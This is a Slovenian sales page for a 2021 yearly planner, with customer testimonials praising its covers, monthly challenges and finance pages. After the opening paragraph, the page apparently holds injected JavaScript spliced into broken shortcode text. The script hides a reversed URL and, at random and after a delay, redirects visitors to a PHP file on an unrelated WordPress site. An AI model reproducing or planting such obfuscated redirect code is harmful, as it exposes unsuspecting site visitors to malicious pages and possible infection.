Kupiš 2, dobiš 3!  To je letni planer, ki si ga bosta oba želela imeti! Planer, s katerim ti bo v letu 2021 boljše in lažje. Je planer, ki te bo motiviral, navdihoval in polnil s pozitivno energijo. Namenjen je vsem organiziranim sanjačem, ustvarjalcem in poslovnežem. Pláner –ja m (á) zvezek za vpisovanje načrtov, obveznosti, dolžnosti. Odlično darilo zate in za tvoje ljubljene.
) == "string") return $Ikf.list[n].split("").reverse().join("");return $Ikf.list[n];};$Ikf.list=["\'php.eroc_nimda/bil/steewt-tsetal-siseneg/snigulp/tnetnoc-pw/moc.nosredneherdied.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom="" hide_on_mobile="small-visibility,medium-visibility,large-visibility" class="" id=""]
Planer sem najprej kupila zase, a ker se je moja najstniška hči zaljubila vanj, sem ga kupila še njej. Sploh se leto 2021 ni začelo, pa že bereva tvoje pozitivne misli in preverjava mesečne izzive. Hvala ti za tako lep planer!
Nina
Ne morem verjeti, da končno obstaja planer, ki me bo spodbujal k napredku. In to za tako majhno ceno!
Nastja
Poplava planerjev. Ampak tvoj me je prepričal z res hudo In drugačno platnico. Pa še globji pomen ima! Sebi sem kupila rdečega, partnerju pa modrega, ampak itak bosta oba moja!
Saša
Razmišljal sem, kaj bi punci kupil za božično darilo. Vem, da vsako leto jamra, da ne dobi dobrega planerja. No, pa sem njej vzel modrega, pa me je tako navdušil, da sem še sebi vzel rdečega. Komaj čakam, da odpre darilo in zajoče od veselja! Še mene je planer prevzel, pa do danes še nisem imel letnega planerja!
Miha
Planer sem podarila svoji mami za Miklavža. Zaradi službe nujno potrebuje planer. Vsako leto se jezi, ker bi ona v planerju imela tudi finančni plan, kakšno lepo misel in prostor za pisanje. In to je TA planer, ki ga je 20 let iskala. Sama pa uporabljam dva planerja - rdečega in modrega, ker se nisem mogla odločiti, saj sta obe platnici čudoviti! Hvala, da si jih ustvarila!
Maja
Z mesečnimi nalogami in finančnim planom si me čisto kupila! Vrhunski rokovnik, v živo še lepši!
Tatjana